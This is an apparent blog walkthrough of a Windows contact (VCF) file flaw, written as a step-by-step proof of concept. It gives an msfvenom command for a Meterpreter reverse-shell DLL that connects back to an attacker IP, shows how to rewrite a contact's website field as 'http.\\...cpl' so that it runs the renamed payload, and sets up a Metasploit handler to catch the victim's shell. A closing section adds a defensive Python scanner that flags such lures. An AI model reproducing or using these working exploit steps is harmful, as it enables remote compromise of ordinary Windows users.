Malicious Contact VCF file Exploit
A. Gerald Young
Cloud Security/Architecture | Cybersecurity Professional | 5x AWS Certified | CISSP | CRISC | CISA | GCIH | GMOB | MCP
On January 15th 2019 a vulnerability was disclosed that allows a Windows PC to be compromised using a malicious contact (VCF) file. It was released as a 0-day and, of course, works on Windows 10 as well. It has been categorized as an "Insufficient UI warning remote code execution" vulnerability.
Introduction:
What was discovered is that if the website in a VCF file is replaced with the local path of a CPL file, Windows runs that file instead of opening the link in a browser. This is done by replacing the "https://" prefix with "http.\\". A regular user would need remarkably sharp eyes to notice the intentional change in the link. Once the change is made, all we need to do is send the victim the malicious VCF file together with our CPL file in a folder named "http" (it has to be "http" and nothing else, because that is the directory the modified link resolves to), and when the victim clicks the link we gain remote access through a shell.
To read more about the research follow the link here.
Methodology:
- Making an msfvenom Windows payload with a .dll extension
- Sending the DLL file in a folder named "http"
- Creating a contact file in the parent folder of "http"
- Adding a website to the contact
- Changing the prefix of the website from https:// to http.\\ and appending the .cpl extension
- Renaming the DLL file to "<name of website>.cpl"
- Running multi/handler in a terminal window
- Opening the website link from the contact
- Spawning a shell
Proof of Concept:
The first step is to make a payload with a .dll extension. For this purpose we are using msfvenom's Windows Meterpreter payload, but any other payload should work just fine.
In this case my local IP address is 192.168.1.109.
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.109 LPORT=1234 -f dll > shell.dll
Next we transfer this payload to the victim machine in a new folder named http. The folder has to be named http and nothing else, because the link we add to the contact later is a relative path: Windows path handling drops the trailing dot in "http." and collapses the doubled separator, so http.\\<name>.cpl resolves to http\<name>.cpl. For the same reason the folder has to sit in the same directory the contact file is opened from. So we copy shell.dll into the http folder on the victim machine.
Next, and the most important step, is to make the contact VCF file. You can download a sample VCF and add a website to it, but we made a new contact file. The system we are using is Windows 10, so the version of the VCF file may differ from yours, but it works just the same.
Add any name in the contact file. I added Magic Johnson.
Click the next tab, titled "Home", and you will see a text box for a website. Add any website name you like; I added "exploityourmachine.tech". Here is the most important thing to note:
A normal website link would be https://www.exploityourmachine.tech, but we modify the prefix just a little by replacing https:// with http.\\, making the link read http.\\www.exploityourmachine.tech
This is because we do not actually want to include a website; we want to include a path to our DLL file, so that when the victim clicks the website link our DLL runs.
We also suffix the link with the ".cpl" extension, so the field finally reads http.\\www.exploityourmachine.tech.cpl. A CPL file is a Control Panel item, such as Display, Mouse, Sound or Network, used by the Windows operating system; Windows loads it as a DLL when it is opened, which is why our payload DLL only needs to be renamed.
Save the contact. Now rename our payload from shell.dll to www.exploityourmachine.tech.cpl so that its name matches the link exactly.
Now we are prepped and ready to run the DLL, so we set up exploit/multi/handler in a terminal window (using the same payload, LHOST and LPORT as the msfvenom command) and open the contact on the victim's machine.
As soon as the victim clicks on the link in the VCF file, we will see a session is obtained on our Kali Linux terminal!
This spawns a shell running as the Windows user who is currently logged on and opened the contact, so its privileges are whatever that user has.
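The artifact built above is easy to recognise once you know its shape: a URL property whose value is not a URL at all but a relative path ending in an executable extension. The following scanner is an added example written for this page (it is not code from the original post or from the original researcher); it unfolds vCard continuation lines, pulls out every URL property regardless of its parameters, and flags values like http.\\www.exploityourmachine.tech.cpl. The two sample contacts are constructed for the example and only approximate what Windows Contacts exports; the file names and the exact vCard layout are assumptions.

```python
"""Scan vCard text for URL properties that are really local paths.

Added example for this page; not code from the original post or researcher.
The sample vCards are constructed and only approximate a Windows Contacts
export (the exact property layout is an assumption)."""
import re

# A genuine web link carries a scheme followed by "://".
SCHEME_RE = re.compile(r"^[A-Za-z][A-Za-z0-9+.-]*://")
# The lure shape from the article: "http" (or https/ftp) with "://" swapped
# for a path separator, so the value is treated as a relative file path.
LURE_RE = re.compile(r"^(https?|ftp)[.:]?[\\/]")
# Extensions the Windows shell will run or load when the target is "opened".
DANGEROUS_EXT = (".cpl", ".exe", ".dll", ".scr", ".bat", ".cmd", ".js", ".vbs", ".hta")


def unfold(vcard_text):
    """Join folded continuation lines (a line beginning with a space or tab
    continues the previous property), so a suffix cannot hide on the next line."""
    lines = []
    for raw in vcard_text.splitlines():
        if raw[:1] in (" ", "\t") and lines:
            lines[-1] += raw[1:]
        else:
            lines.append(raw)
    return lines


def url_values(vcard_text):
    """Return the value of every URL property, whatever parameters it carries
    (URL;HOME:..., URL;TYPE=WORK:..., ...)."""
    values = []
    for line in unfold(vcard_text):
        name, sep, value = line.partition(":")
        if sep and name.split(";", 1)[0].strip().upper() == "URL":
            values.append(value.strip())
    return values


def suspicious_url(value):
    """Return a reason string if the URL value is a local-path lure, else None."""
    if SCHEME_RE.match(value):
        return None  # ordinary http://, https://, ftp:// ... link
    lowered = value.lower()
    if LURE_RE.match(lowered):
        reason = "scheme separator replaced by a path separator"
    elif "\\" in lowered or lowered.startswith(("./", "../", "/")):
        reason = "local path instead of a URL"
    else:
        reason = "no URL scheme"
    for ext in DANGEROUS_EXT:
        if lowered.endswith(ext):
            return reason + "; target has executable extension " + ext
    return reason


def scan_vcard(vcard_text):
    """Return (url value, reason) for each URL property worth a closer look."""
    findings = []
    for value in url_values(vcard_text):
        reason = suspicious_url(value)
        if reason:
            findings.append((value, reason))
    return findings


# Constructed sample: the contact from the article, whose website field points
# at http\www.exploityourmachine.tech.cpl next to the .vcf file.
LURE_VCF = "\r\n".join([
    "BEGIN:VCARD",
    "VERSION:2.1",
    "N:Johnson;Magic",
    "FN:Magic Johnson",
    "URL;HOME:http.\\\\www.exploityourmachine.tech.cpl",
    "END:VCARD",
])

# Constructed sample: the same contact with a genuine website.
BENIGN_VCF = "\r\n".join([
    "BEGIN:VCARD",
    "VERSION:2.1",
    "FN:Magic Johnson",
    "URL;HOME:https://www.exploityourmachine.tech",
    "END:VCARD",
])

if __name__ == "__main__":
    for label, text in (("lure", LURE_VCF), ("benign", BENIGN_VCF)):
        print(label, scan_vcard(text) or "clean")
```

Run against a mailbox export or a quarantine folder, a hit on the lure pattern plus a .cpl extension is a high-confidence indicator; a bare "no URL scheme" hit on its own is usually just a contact whose website was typed without a prefix and deserves a look rather than an alert.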
Conclusion:
This vulnerability works on all versions of Windows that support contact VCF files, which includes Windows 10; as shown above, we spawned a Windows 10 shell. At the time of writing, this 0-day exploit has yet to be patched by Microsoft. You can read more about this exploit here.